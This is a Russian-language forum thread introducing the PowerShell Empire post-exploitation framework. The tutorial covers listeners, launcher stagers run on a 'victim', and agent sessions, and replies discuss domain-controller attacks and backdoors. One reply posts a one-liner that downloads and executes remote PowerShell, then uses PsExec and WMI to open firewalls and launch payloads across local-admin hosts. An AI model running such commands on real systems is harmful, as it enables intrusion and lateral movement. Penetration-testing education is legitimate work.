• Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе

    «Анализ защищенности веб-приложений»

    🔥 Записаться бесплатно!

  • CTF с учебными материалами Codeby Games

    Обучение кибербезопасности в игровой форме. Более 200 заданий по Active Directory, OSINT, PWN, Веб, Стеганографии, Реверс-инжинирингу, Форензике и Криптографии. Школа CTF с бесплатными курсами по всем категориям.

Статья Знакомство с PowerShell Empire Framework

И так привет колеги. Сегодня я хотел бы немного Вас ознакомить с прекрасным ,по моему скромному мнению, продуктом PowerShell Empire Framework.

PowerShell Empire Framework - это агент для пост эксплуатации windows систем,написанный полностью на павершеле (серверная часть на питона а клиентская на павершеле,по этому легко поднять серверную часть на том же Kali Linux) и имеет в себе огромный функционал. Как я заметил что помимо того , что он используется для пост эксплуатации ( повышение привилегий, закрепленния в системе) он активно так очень используется и для активного фишинга,обхода антивируса и эксплуатации уязвимостей и одна из главных фишок - отлично используется для атак на Домен Контролеры. Конечно я все это хочу вам рассказать))) но сегодня мы слегка ознакомимся с интерфейсом фреймворка и базовы самые моменты)

Вобщем поехали)
Первым делом качаем:
Код:
git clone https://github.com/adaptivethreat/Empire.git
Запускаем
1.PNG


Смотрим help

2.PNG


Как и в любой клиент серверной программе сначала нам предстоит настроить listener(наш ip адрес и порт на котором мы будем встречать соединение с удаленной windows системы)
Идем в listener и смотрим командой options перечень параметров которые нам доступны для изменения:
3.PNG

Командой set Name можем задать имя нашему листенеру,аналогично можем указать порт и ip адрес.
Далее посмотрим какие есть векторы експлуатации клиенской части (stagers)
командой usestager и двойным нажатием клавиши tab
4.PNG

Как видите тут довольно таки большой выбор.Есть как dll injection,hta,Rubber Ducker,макросы и т.д.
Ну для ознакомления мы используем стейжер launcher - который создаст нам однострочную команду для powerhsell которую нужно будет запустить на стороне жертвы.

5.PNG

Вводим команды
Код:
usestager launcher
set Listener DarkNode
execute
Надеюсь понятно что usestager launcher - говорим какой стейжер будет юзать.
set Listener указываем на каком листенере будем встречать коннект.
execute - сгенерировать команду
На вывод получаем нашу команду:
6.PNG


Дальше запускаем эту команду на стороне жертвы и ловим соединение (В отличии от метасплоита там сессии называют в большинстве случаев метерпретер сессии ,а в импери (Empire) агентами)
И вот к нам прилетает агент)
7.PNG
8.PNG

Командой list agents - посмотреть список агентов
rename - можно переименовать имя агента(так по дефолту оно рандомное) - это не обизательно,больше для удобства просто.
interact - мигрировать в сессию агента (аналогично как session -i в метасплоите)

Дальше у нас открывается очень много функционала,изучаем команду help:
9.PNG


И еще перечень модулей можно посмотреть командой
usemodule "и нажать клавишу таб [tab]"
10.PNG


Так для примера возьмем модуль тролинга и выведем сообщение об ошибке с нужным нам текстом на стороне жертвы
11.PNG
12.PNG


Установка Powershell Empire на Кали Линукс


Всем спасибо)) Продолжения следует) Хех)
 
Последнее редактирование:
I

Inject0r

Супер! Интересно про атаку на DC с помощью этой утилиты почитать)
 

<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
722
3 099
BIT
0
Ну у меня железа нету что бы с эмулировать нормально.
Как вариант под большой хайд могу запилить прохождения таска на рутми.
Так как раз наглядно демонстрируется атаки на АктивДиректори и домен контролер через голден тикет.

Вот таск
Просто его прошли всего 68 человек из 39тыс. учасников. Сливать решение буду под хайд гдето в 70 сообщений только)
 

useralexrc

Green Team
12.11.2016
30
7
BIT
0
Сделал все кроме макроса через свой VPS, работает. Ночью сделаю макрос и продолжу)
 
  • Нравится
Реакции: <~DarkNode~>

useralexrc

Green Team
12.11.2016
30
7
BIT
0
(Empire: listeners) > execute
[!] Error starting listener on port 8080: [Errno 98] Address already in use
[!] Error starting listener on port 8080, port likely already in use.
В чем может быть причина?
 
M

Mr.Gor

Ну у меня железа нету что бы с эмулировать нормально.
Как вариант под большой хайд могу запилить прохождения таска на рутми.
Так как раз наглядно демонстрируется атаки на АктивДиректори и домен контролер через голден тикет.

Вот таск
Просто его прошли всего 68 человек из 39тыс. учасников. Сливать решение буду под хайд гдето в 70 сообщений только)

Спасибо за статью!
Заинтересовал таском BlueBox Pentest. Буду ждать статейку.
 
  • Нравится
Реакции: <~DarkNode~>

<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
722
3 099
BIT
0
Уже разобрался, спасибо за статью)
Два раза команду execute наверное выполнил)
И он поругался на то что порт занят уже)
Можно создавать много листенеров просто нужно указывать им разные порты командой set Port
И разные имена им давать.

Так же можно выбрать тип листенера командой set Type (по умолчанию native) и к примеру создать листенер для метасплоиа и легко мигрировать с империи в метасплоит если нужно выполнить там какойто модуль или какой то функционал.
Если нужно подробнее о миграции в метасплоит - я могу написать пост как это делать.Там все easy(легко).
 
  • Нравится
Реакции: gu3st
K

klentod

спасибо все получилось) жду продолжения
 

viktorcruce

Green Team
19.12.2016
28
5
BIT
0
Ну у меня железа нету что бы с эмулировать нормально.
Как вариант под большой хайд могу запилить прохождения таска на рутми.
Так как раз наглядно демонстрируется атаки на АктивДиректори и домен контролер через голден тикет.

Вот таск
Просто его прошли всего 68 человек из 39тыс. учасников. Сливать решение буду под хайд гдето в 70 сообщений только)
если не трудно бро то можно в пм саму технику. я видел как автор нишанга делал эту атаку незнаю насколько она сейчас актуальна)

Собрал для своих нужд вот такой комбаин...

[HIDE="35"]IEX (New-Object Net.WebClient).DownloadString(' link removed IEX (New-Object Net.WebClient).DownloadString(' link removed Invoke-FindLocalAdminAccess -Threads 40 | foreach { "Name : "+$_;Invoke-PsExec -Command 'netsh advfirewall firewall set rule group="windows management instrumentation (wmi)" new enable=yes' -ComputerName $_ ; Invoke-WMIMethod -Class Win32_Process -Name Create -ArgumentList "your payload" -Computername $_ }
 
  • Нравится
Реакции: Tihon49 и <~DarkNode~>
D

Dmitry88

Сегодня протестировал связку fuzzbunch и Empire. Господа, это шикарно. В доменной сети закидывает через smb необходимую dll и позволяет создать довольно живучий бекдор.
ПС: Вопрос к модераторам, я так понимаю копипаста, даже со своими скриншотами не приветствуется на ресурсе ? Просто думал мини-статейку накатать по этой связке. Или ограничиться ссылкой на исходнуюю статью?
 

<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
722
3 099
BIT
0
Сегодня протестировал связку fuzzbunch и Empire. Господа, это шикарно. В доменной сети закидывает через smb необходимую dll и позволяет создать довольно живучий бекдор.
ПС: Вопрос к модераторам, я так понимаю копипаста, даже со своими скриншотами не приветствуется на ресурсе ? Просто думал мини-статейку накатать по этой связке. Или ограничиться ссылкой на исходнуюю статью?
Я приветствую, если указан источник на ресурс.
 
H

hdmoor

Моё почтение ~~DarkNode~~ ! С выходом релиза 2.0 испытываю серьёзные проблемы с синтаксисом, команда info не работает. Вы наверняка точно знаете где надо посмотреть и увидеть изменения в синтаксисе команд. Буду очень признателен если дадите такую информацию.
 

<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
722
3 099
BIT
0
Моё почтение ~~DarkNode~~ ! С выходом релиза 2.0 испытываю серьёзные проблемы с синтаксисом, команда info не работает. Вы наверняка точно знаете где надо посмотреть и увидеть изменения в синтаксисе команд. Буду очень признателен если дадите такую информацию.
Сделай скриншот проблемы,попытаюсь помочь.
 
H

hdmoor

Screenshot from 2017-05-20 04-34-54.png


Раньше было listeners и командой set можно было посмотреть нагрузки, теперь не так,
В этой связи вопрос:
Какая команда нужна что бы выбрать stager для создания dll
sat - не работает, какя команда ознакомит с возможностями стейджера?

эти изменения разрабы где ни будь обозначили? где? можно на них посмотреть? (я искал уверяю но не нашёл)
[doublepost=1495287827,1495271875][/doublepost]У неё веб-морда есть, годная нет? https://github.com/interference-security/empire-web
 

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 186
BIT
0
Посмотреть вложение 10156

Раньше было listeners и командой set можно было посмотреть нагрузки, теперь не так,
В этой связи вопрос:
Какая команда нужна что бы выбрать stager для создания dll
sat - не работает, какя команда ознакомит с возможностями стейджера?

эти изменения разрабы где ни будь обозначили? где? можно на них посмотреть? (я искал уверяю но не нашёл)
[doublepost=1495287827,1495271875][/doublepost]У неё веб-морда есть, годная нет? https://github.com/interference-security/empire-web
Командой set нужно менять параметр стажер или листенер

смотри внемательно!! у меня все получилось он работает только не пытайся параметр http в листенере поменять!
 

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 186
BIT
0
Сегодня вышла обнова! и там много вкусного!)))

Код:
-Add get schwifty trollsploit module @424f424f
-Add -sta flag to launcher @xorrior
-Fixed hardoced cert path @xorrior
-Fix for #567
-Merge Capture OSX credentials from Prompt Module in Empire DB @malcomvetter.
-Rest Api fixups #526 @byt3bl33d3r
-Added MS16-135 exploit module @ThePirateWhoSmellsOfSunflowers
-Updated Bloodhound Ingestion module @rvrsh3ll
-Added Dropbox exfil module @ktevora1
-Added EternalBlue module @ktevora1
-Fix SSL certificate issue with Flask @diskonnect
-Modify staging to handle unicode characters @killswitch-GUI
-Add wmi_updater module #509 @tristandostaler
-Add DropBox exfil module #557 @e0x70i
-Fix Unexpected error: <class 'struct.error'> run empire #567
-Fix SSL Intermediate Certificates to support Domain Fronting #569 @dchrastil
-Add ‘SandboxMode’ to evade Apple Sandbox protection on applescript #578 @dchrastil
-Add Obfuscated Empire #597 @cobbr
-Add Bypass ScriptBlock Logging #603 @cobbr
-Add mimipenguin module @rvrsh3ll
-Add dyld_print_to_file Mac privesc @checkyfuntime
-Added manual proxy specifications @xorrior
-Fix libssl-dev and libssl1.0.0 packages @xorrior
-Add backgrounding for downloads in PowerShell agent @xorrior
-Fix warning patch in http listener @viss
-Update Invoke-Kerberoast @424f424f
-Tab complete shows elevated modules: #599
- Additional bypassUAC modules added: #596
- Added show uac level module #609
- Fixed shebangs: #640
 
Последнее редактирование:
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!